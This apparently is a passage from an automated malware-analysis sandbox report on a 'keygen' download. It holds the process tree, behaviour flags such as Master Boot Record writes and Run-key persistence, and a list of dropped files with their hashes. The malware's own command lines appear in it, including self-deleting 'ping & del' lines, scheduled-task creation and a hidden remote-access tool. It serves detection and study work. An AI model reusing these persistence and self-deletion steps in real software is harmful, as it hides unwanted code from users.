            • C:\Windows\SysWOW64\PING.EXE
              ping 1.1.1.1 -n 1 -w 3000
              Runs ping.exe
              PID:5064
        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-4.exe
          keygen-step-4.exe
          PID:3792
          • C:\Users\Admin\AppData\Local\Temp\RarSFX9\002.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX9\002.exe"
            Suspicious use of SetWindowsHookEx
            PID:4224
          • C:\Users\Admin\AppData\Local\Temp\RarSFX9\Setup.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX9\Setup.exe"
            PID:2992
            • C:\Users\Admin\AppData\Local\Temp\sibADCE.tmp\0\setup.exe
              "C:\Users\Admin\AppData\Local\Temp\sibADCE.tmp\0\setup.exe" -s
              PID:4812
              • C:\Program Files (x86)\9ku5npt6tedk\aliens.exe
                "C:\Program Files (x86)\9ku5npt6tedk\aliens.exe"
                Writes to the Master Boot Record (MBR)
                Suspicious use of NtSetInformationThreadHideFromDebugger
                PID:3752
                • C:\Windows\SysWOW64\msiexec.exe
                  msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
                  Enumerates connected drives
                  Suspicious behavior: GetForegroundWindowSpam
                  Suspicious use of FindShellTrayWindow
                  PID:2852
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c ping 127.0.0.1 -n 3 & del "C:\Program Files (x86)\9ku5npt6tedk\aliens.exe"
                  PID:1220
                  • C:\Windows\SysWOW64\PING.EXE
                    ping 127.0.0.1 -n 3
                    Runs ping.exe
                    PID:3816
          • C:\Users\Admin\AppData\Local\Temp\RarSFX9\jg2_2qua.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX9\jg2_2qua.exe"
            PID:2736
    • C:\Windows\SysWOW64\cmmon32.exe
      "C:\Windows\SysWOW64\cmmon32.exe"
      Adds policy Run key to start application
      Suspicious use of SetThreadContext
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      PID:2428
      • C:\Windows\SysWOW64\cmd.exe
        /c del "C:\Users\Admin\AppData\Roaming\2.exe"
        PID:2532
    • C:\Windows\SysWOW64\mstsc.exe
      "C:\Windows\SysWOW64\mstsc.exe"
      Adds Run key to start application
      Suspicious use of SetThreadContext
      Modifies Internet Explorer settings
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      PID:3636
      • C:\Windows\SysWOW64\cmd.exe
        /c del "C:\Users\Admin\AppData\Roaming\18.exe"
        PID:3000
    • C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe
      "C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"
      Suspicious use of SetThreadContext
      Suspicious behavior: MapViewOfSection
      PID:3844
      • C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe
        "C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"
        Suspicious use of SetThreadContext
        Suspicious behavior: MapViewOfSection
        PID:1548
    • C:\Windows\SysWOW64\autoconv.exe
      "C:\Windows\SysWOW64\autoconv.exe"
      PID:3100
    • C:\Windows\SysWOW64\mstsc.exe
      "C:\Windows\SysWOW64\mstsc.exe"
      PID:2768
    • C:\Windows\SysWOW64\cmmon32.exe
      "C:\Windows\SysWOW64\cmmon32.exe"
      Adds Run key to start application
      Suspicious use of SetThreadContext
      Modifies Internet Explorer settings
      Suspicious behavior: MapViewOfSection
      PID:4560
      • C:\Windows\SysWOW64\cmd.exe
        /c del "C:\Users\Admin\AppData\Roaming\11.exe"
        PID:4420
    • C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe
      "C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"
      Suspicious use of SetThreadContext
      Suspicious behavior: MapViewOfSection
      PID:2416
      • C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe
        "C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"
        Suspicious use of SetThreadContext
        Suspicious behavior: MapViewOfSection
        PID:1568
    • C:\Program Files (x86)\Zfx4lo\helpqrqlwhj.exe
      "C:\Program Files (x86)\Zfx4lo\helpqrqlwhj.exe"
      Maps connected drives based on registry
      Suspicious use of SetThreadContext
      Suspicious behavior: MapViewOfSection
      PID:3432
    • C:\Windows\SysWOW64\help.exe
      "C:\Windows\SysWOW64\help.exe"
      PID:1972
    • C:\Windows\SysWOW64\colorcpl.exe
      "C:\Windows\SysWOW64\colorcpl.exe"
      PID:4976
    • C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe
      "C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"
      Suspicious use of SetThreadContext
      Suspicious behavior: MapViewOfSection
      PID:5052
      • C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe
        "C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"
        Suspicious use of SetThreadContext
        Suspicious behavior: MapViewOfSection
        PID:4032
    • C:\Windows\SysWOW64\rundll32.exe
      "C:\Windows\SysWOW64\rundll32.exe"
      PID:3692
    • C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe
      "C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"
      Suspicious use of SetThreadContext
      Suspicious behavior: MapViewOfSection
      PID:4680
      • C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe
        "C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"
        Suspicious use of SetThreadContext
        Suspicious behavior: MapViewOfSection
        PID:2412
    • C:\Windows\SysWOW64\ipconfig.exe
      "C:\Windows\SysWOW64\ipconfig.exe"
      Gathers network information
      PID:5272
    • C:\Program Files (x86)\Zif6hz\regsvcojoduf-.exe
      "C:\Program Files (x86)\Zif6hz\regsvcojoduf-.exe"
      Checks BIOS information in registry
      Maps connected drives based on registry
      Suspicious use of SetThreadContext
      PID:5768
      • C:\Windows\SysWOW64\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AnLKhBlJfQ" /XML "C:\Users\Admin\AppData\Local\Temp\tmp4FE5.tmp"
        Creates scheduled task(s)
        PID:1680
      • C:\Program Files (x86)\Zif6hz\regsvcojoduf-.exe
        "{path}"
        Suspicious use of SetThreadContext
        PID:4616
    • C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe
      "C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"
      Suspicious use of SetThreadContext
      Suspicious behavior: MapViewOfSection
      PID:5020
      • C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe
        "C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"
        Suspicious use of SetThreadContext
        Suspicious behavior: MapViewOfSection
        PID:3580
        • C:\Windows\SysWOW64\NETSTAT.EXE
          "C:\Windows\SysWOW64\NETSTAT.EXE"
          Gathers network information
          PID:2920
    • C:\Windows\SysWOW64\autochk.exe
      "C:\Windows\SysWOW64\autochk.exe"
      PID:2312
    • C:\Windows\SysWOW64\autofmt.exe
      "C:\Windows\SysWOW64\autofmt.exe"
      PID:4708
    • C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe
      "C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"
      Suspicious use of SetThreadContext
      Suspicious behavior: MapViewOfSection
      PID:3256
      • C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe
        "C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"
        Suspicious use of SetThreadContext
        Suspicious behavior: MapViewOfSection
        PID:4424
    • C:\Windows\SysWOW64\systray.exe
      "C:\Windows\SysWOW64\systray.exe"
      PID:3640
    • C:\Windows\SysWOW64\msdt.exe
      "C:\Windows\SysWOW64\msdt.exe"
      PID:5612
  • C:\ProgramData\Windows\rutserv.exe
    C:\ProgramData\Windows\rutserv.exe
    Executes dropped EXE
    Suspicious behavior: EnumeratesProcesses
    Suspicious use of AdjustPrivilegeToken
    Suspicious use of SetWindowsHookEx
    PID:2280
  • C:\Windows\system32\AUDIODG.EXE
    C:\Windows\system32\AUDIODG.EXE 0x520
    Suspicious use of AdjustPrivilegeToken
    PID:2660
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {9ED4442B-3F45-4DFB-955D-CC52BE690C72} S-1-5-21-3825035466-2522850611-591511364-1000:EIDQHRRL\Admin:Interactive:[1]
    PID:3216
    • C:\Programdata\RealtekHD\taskhost.exe
      C:\Programdata\RealtekHD\taskhost.exe
      Drops file in System32 directory
      Suspicious behavior: GetForegroundWindowSpam
      PID:3516
      • C:\Programdata\WindowsTask\winlogon.exe
        C:\Programdata\WindowsTask\winlogon.exe
        PID:1552
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /C schtasks /query /fo list
          PID:2744
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /query /fo list
            PID:3448
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /C schtasks /Delete /TN "Updates\AnLKhBlJfQ" /F
          PID:2144
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /Delete /TN "Updates\AnLKhBlJfQ" /F
            PID:3308
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /C schtasks /Delete /TN "Updates\AnLKhBlJfQ" /F
          PID:5440
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /Delete /TN "Updates\AnLKhBlJfQ" /F
            PID:5756
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /C schtasks /Delete /TN "Updates\qATVyEXYNcqQZF" /F
          PID:2104
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /Delete /TN "Updates\qATVyEXYNcqQZF" /F
            PID:4884
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /C schtasks /Delete /TN "Updates\qATVyEXYNcqQZF" /F
          PID:3572
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /Delete /TN "Updates\qATVyEXYNcqQZF" /F
            PID:3836
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /C schtasks /Delete /TN "Updates\wWTxgR" /F
          PID:2976
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /Delete /TN "Updates\wWTxgR" /F
            PID:4320
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /C schtasks /Delete /TN "Updates\wWTxgR" /F
          PID:1304
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /Delete /TN "Updates\wWTxgR" /F
            PID:5296
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ipconfig /flushdns
        PID:3324
    • C:\Programdata\RealtekHD\taskhostw.exe
      C:\Programdata\RealtekHD\taskhostw.exe
      PID:3420
    • C:\Programdata\RealtekHD\taskhostw.exe
      C:\Programdata\RealtekHD\taskhostw.exe
      PID:4856
    • C:\Programdata\RealtekHD\taskhostw.exe
      C:\Programdata\RealtekHD\taskhostw.exe
      PID:1444
    • C:\Programdata\RealtekHD\taskhostw.exe
      C:\Programdata\RealtekHD\taskhostw.exe
      PID:2980
    • C:\Programdata\RealtekHD\taskhostw.exe
      C:\Programdata\RealtekHD\taskhostw.exe
      PID:5128
    • C:\Programdata\RealtekHD\taskhostw.exe
      C:\Programdata\RealtekHD\taskhostw.exe
      PID:688
    • C:\Programdata\RealtekHD\taskhostw.exe
      C:\Programdata\RealtekHD\taskhostw.exe
      PID:5864
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    Suspicious use of AdjustPrivilegeToken
    PID:2800
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    Enumerates connected drives
    PID:2264
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding C715B638DCD0275E9924148DADA4DC31 C
      PID:3588
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 7149B171DBF515120FD73317ACE2DD0E C
      PID:5836
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k NetworkService
    Drops file in System32 directory
    Modifies data under HKEY_USERS
    Suspicious behavior: LoadsDriver
    PID:3608
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    PID:5940
  • C:\Windows\system32\AUDIODG.EXE
    C:\Windows\system32\AUDIODG.EXE 0x224
    PID:5656
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {A93D8764-8FF3-462F-8120-46B3D3608D96} S-1-5-18:NT AUTHORITY\System:Service:
    PID:4540
Network
Downloads
  • C:\Program Files (x86)\9ku5npt6tedk\aliens.exe

  • C:\Program Files (x86)\9ku5npt6tedk\aliens.exe

  • C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe

  • C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe

  • C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe

  • C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe

  • C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe

  • C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe

  • C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe

  • C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe

  • C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe

  • C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe

  • C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe

  • C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe

  • C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe

  • C:\Program Files (x86)\Zfx4lo\helpqrqlwhj.exe

  • C:\Program Files (x86)\Zfx4lo\helpqrqlwhj.exe

  • C:\Program Files (x86)\Zif6hz\regsvcojoduf-.exe

  • C:\Program Files (x86)\Zif6hz\regsvcojoduf-.exe

  • C:\Program Files (x86)\Zif6hz\regsvcojoduf-.exe

  • C:\Program Files (x86)\dz7d9shn0mvi\aliens.exe

  • C:\Program Files (x86)\dz7d9shn0mvi\aliens.exe

  • C:\Program Files (x86)\fjkw1lb5cxpb\aliens.exe

  • C:\Program Files (x86)\fjkw1lb5cxpb\aliens.exe

  • C:\Program Files\Common Files\System\iediagcmd.exe

  • C:\ProgramData\ADiag\Debug\Adlice Diag_debug.log

  • C:\ProgramData\ADiag\advert

  • C:\ProgramData\ADiag\config.ini

  • C:\ProgramData\ADiag\scheduler

  • C:\ProgramData\Microsoft\Check\Check.txt

  • C:\ProgramData\Microsoft\Intel\R8.exe

  • C:\ProgramData\Microsoft\Intel\R8.exe

  • C:\ProgramData\Microsoft\Intel\taskhost.exe

  • C:\ProgramData\Microsoft\Intel\taskhost.exe

  • C:\ProgramData\Microsoft\Intel\wini.exe

  • C:\ProgramData\Microsoft\Intel\wini.exe

  • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta

  • C:\ProgramData\Microsoft\temp\Log.txt

  • C:\ProgramData\RDPWinst.exe

  • C:\ProgramData\RealtekHD\taskhost.exe

  • C:\ProgramData\RealtekHD\taskhost.exe

  • C:\ProgramData\RealtekHD\taskhost.exe

  • C:\ProgramData\RealtekHD\taskhostw.exe

  • C:\ProgramData\RealtekHD\taskhostw.exe

  • C:\ProgramData\RealtekHD\taskhostw.exe

  • C:\ProgramData\RealtekHD\taskhostw.exe

  • C:\ProgramData\RealtekHD\taskhostw.exe

  • C:\ProgramData\RealtekHD\taskhostw.exe

  • C:\ProgramData\RealtekHD\taskhostw.exe

  • C:\ProgramData\RealtekHD\taskhostw.exe

  • C:\ProgramData\RealtekHD\taskhostw.exe

  • C:\ProgramData\WindowsTask\OpenCL.DLL

  • C:\ProgramData\WindowsTask\azur.exe

  • C:\ProgramData\WindowsTask\azur.exe

  • C:\ProgramData\WindowsTask\system.exe

    MD5

    49e31c4bcd9f86ba897dc7e64176dc50

    SHA1

    cbf0134bd25fd631c3baae23b9e5c79dffef870a

    SHA256

    006c8ee1ba292e19b1ee6d74d2eb3f8ca8f2c5a9e51a12b37501ea658e10c641

    SHA512

    b1ffb2eb281bd773eecfbf6df1d92073cba3298749736c775a82974f80cc938ffcf281a9cfd6bb0f8aa9961f9ee92e9a641cddae4f9e141190fdc569a24b1d70

  • C:\ProgramData\WindowsTask\system.exe

    MD5

    49e31c4bcd9f86ba897dc7e64176dc50

    SHA1

    cbf0134bd25fd631c3baae23b9e5c79dffef870a

    SHA256

    006c8ee1ba292e19b1ee6d74d2eb3f8ca8f2c5a9e51a12b37501ea658e10c641

    SHA512

    b1ffb2eb281bd773eecfbf6df1d92073cba3298749736c775a82974f80cc938ffcf281a9cfd6bb0f8aa9961f9ee92e9a641cddae4f9e141190fdc569a24b1d70

  • C:\ProgramData\WindowsTask\update.exe

    MD5

    c830b8a074455cc0777ed5bc0bfd2678

    SHA1

    bff2a96c092f8c5620a4d4621343594cd8892615

    SHA256

    3567966f3f2aa2e44d42b4bd3adae3c5bb121296c1901f69547ad36cd0d0f5f9

    SHA512

    c90eb64fee3ab08b8f23fc8958fd7f69c1decbe4295d071d07dc427042e53796edf511e7d61600dcdb7d7429925135f42752e199785049134ac7c0dbbf15f541

  • C:\ProgramData\WindowsTask\update.exe

    MD5

    c830b8a074455cc0777ed5bc0bfd2678

    SHA1

    bff2a96c092f8c5620a4d4621343594cd8892615

    SHA256

    3567966f3f2aa2e44d42b4bd3adae3c5bb121296c1901f69547ad36cd0d0f5f9

    SHA512

    c90eb64fee3ab08b8f23fc8958fd7f69c1decbe4295d071d07dc427042e53796edf511e7d61600dcdb7d7429925135f42752e199785049134ac7c0dbbf15f541

  • C:\ProgramData\WindowsTask\winlogon.exe

    MD5

    ec0f9398d8017767f86a4d0e74225506

    SHA1

    720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36

    SHA256

    870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375

    SHA512

    d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484

  • C:\ProgramData\Windows\install.vbs

  • C:\ProgramData\Windows\reg1.reg

  • C:\ProgramData\Windows\reg2.reg

  • C:\ProgramData\Windows\rutserv.exe

    MD5

    37a8802017a212bb7f5255abc7857969

    SHA1

    cb10c0d343c54538d12db8ed664d0a1fa35b6109

    SHA256

    1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

    SHA512

    4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

  • C:\ProgramData\Windows\rutserv.exe

    MD5

    37a8802017a212bb7f5255abc7857969

    SHA1

    cb10c0d343c54538d12db8ed664d0a1fa35b6109

    SHA256

    1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

    SHA512

    4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

  • C:\ProgramData\Windows\rutserv.exe

    MD5

    37a8802017a212bb7f5255abc7857969

    SHA1

    cb10c0d343c54538d12db8ed664d0a1fa35b6109

    SHA256

    1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

    SHA512

    4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

  • C:\ProgramData\Windows\rutserv.exe

    MD5

    37a8802017a212bb7f5255abc7857969

    SHA1

    cb10c0d343c54538d12db8ed664d0a1fa35b6109

    SHA256

    1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

    SHA512

    4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

  • C:\ProgramData\Windows\rutserv.exe

    MD5

    37a8802017a212bb7f5255abc7857969

    SHA1

    cb10c0d343c54538d12db8ed664d0a1fa35b6109

    SHA256

    1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

    SHA512

    4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

  • C:\ProgramData\Windows\vp8decoder.dll

    MD5

    88318158527985702f61d169434a4940

    SHA1

    3cc751ba256b5727eb0713aad6f554ff1e7bca57

    SHA256

    4c04d7968a9fe9d9258968d3a722263334bbf5f8af972f206a71f17fa293aa74

    SHA512

    5d88562b6c6d2a5b14390512712819238cd838914f7c48a27f017827cb9b825c24ff05a30333427acec93cd836e8f04158b86d17e6ac3dd62c55b2e2ff4e2aff

  • C:\ProgramData\Windows\vp8encoder.dll

    MD5

    6298c0af3d1d563834a218a9cc9f54bd

    SHA1

    0185cd591e454ed072e5a5077b25c612f6849dc9

    SHA256

    81af82019d9f45a697a8ca1788f2c5c0205af9892efd94879dedf4bc06db4172

    SHA512

    389d89053689537cdb582c0e8a7951a84549f0c36484db4346c31bdbe7cb93141f6a354069eb13e550297dc8ec35cd6899746e0c16abc876a0fe542cc450fffe

  • C:\ProgramData\Windows\winit.exe

  • C:\ProgramData\Windows\winit.exe

  • C:\ProgramData\install\cheat.exe

  • C:\ProgramData\install\utorrent.exe

    MD5

    8590e82b692b429189d114dda535b6e8

    SHA1

    5d527ad806ac740e2e2769f149270be6a722e155

    SHA256

    af5d5c340c063e7f4a70bd55ce1634b910e5d43d59c1008b4ad38d2c52c8db7d

    SHA512

    0747d770a6e5cc1fcd0b3ed060eaaa37531c9483620253aec8fc8fb472435d14b235e10339e52a41a563a0bc9af4e109940a71bb4e08495563ef7c581e962fda

  • C:\ProgramData\sib\{F9266136-0000-46F8-BC66-FDD9185E4296}\SibCa.dll

  • C:\ProgramData\sib\{F9266136-0000-46F8-BC66-FDD9185E4296}\SibCa.dll

  • C:\ProgramData\sib\{F9266136-0000-46F8-BC66-FDD9185E4296}\SibClr.dll

  • C:\ProgramData\sib\{F9266136-0000-46F8-BC66-FDD9185E4296}\SibClr.dll

  • C:\ProgramData\sib\{F9266136-0000-46F8-BC66-FDD9185E4296}\sib.dat

  • C:\ProgramData\sib\{F9266136-0000-46F8-BC66-FDD9185E4296}\sib.dat

  • C:\Programdata\Install\del.bat

  • C:\Programdata\Install\utorrent.exe

    MD5

    8590e82b692b429189d114dda535b6e8

    SHA1

    5d527ad806ac740e2e2769f149270be6a722e155

    SHA256

    af5d5c340c063e7f4a70bd55ce1634b910e5d43d59c1008b4ad38d2c52c8db7d

    SHA512

    0747d770a6e5cc1fcd0b3ed060eaaa37531c9483620253aec8fc8fb472435d14b235e10339e52a41a563a0bc9af4e109940a71bb4e08495563ef7c581e962fda

  • C:\Programdata\RealtekHD\taskhostw.exe

  • C:\Programdata\WindowsTask\winlogon.exe

    MD5

    ec0f9398d8017767f86a4d0e74225506

    SHA1

    720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36

    SHA256

    870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375

    SHA512

    d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484

  • C:\Programdata\Windows\install.bat

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1FC0448E6D3D5712272FAF5B90A70C5E

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1FC0448E6D3D5712272FAF5B90A70C5E

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\82CB34DD3343FE727DF8890D352E0D8F

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\85B3F147E3624A14E6A20DB4F6C2C5D9

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\9FF67FB3141440EED32363089565AE60_1E9C69B81893CED35518318987DF02B9

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CC4FEA46495CA161D470CD085EDBAADE

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0968A1E3A40D2582E7FD463BAEB59CD

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E49827401028F7A0F97B5576C77A26CB_7CE95D8DCA26FE957E7BD7D76F353B08

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\070E0202839D9D67350CD2613E78E416

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1FC0448E6D3D5712272FAF5B90A70C5E

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1FC0448E6D3D5712272FAF5B90A70C5E

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3538626A1FCCCA43C7E18F220BDD9B02

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\572BF21E454637C9F000BE1AF9B1E1A9

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\620BEF1064BD8E252C599957B3C91896

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6332EF8BBDB37EF2CA5EA9175CD80A6A_249B8DF1FD979D67B8F5FA992F6E1C06

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6332EF8BBDB37EF2CA5EA9175CD80A6A_80456BE7777CD5B8119F8617F281C71B

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6332EF8BBDB37EF2CA5EA9175CD80A6A_E93E5688C540799AF12D2A7ADDC81191

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6A2279C2CA42EBEE26F14589F0736E50

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\75CA58072B9926F763A91F0CC2798706_93E4B2BA79A897B3100CCB27F2D3BF4F

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7BD0F6282AC5A368D6075BF7A1D958EC

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7BD0F6282AC5A368D6075BF7A1D958EC

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\82CB34DD3343FE727DF8890D352E0D8F

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\82CB34DD3343FE727DF8890D352E0D8F

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\85B3F147E3624A14E6A20DB4F6C2C5D9

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\85B3F147E3624A14E6A20DB4F6C2C5D9

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

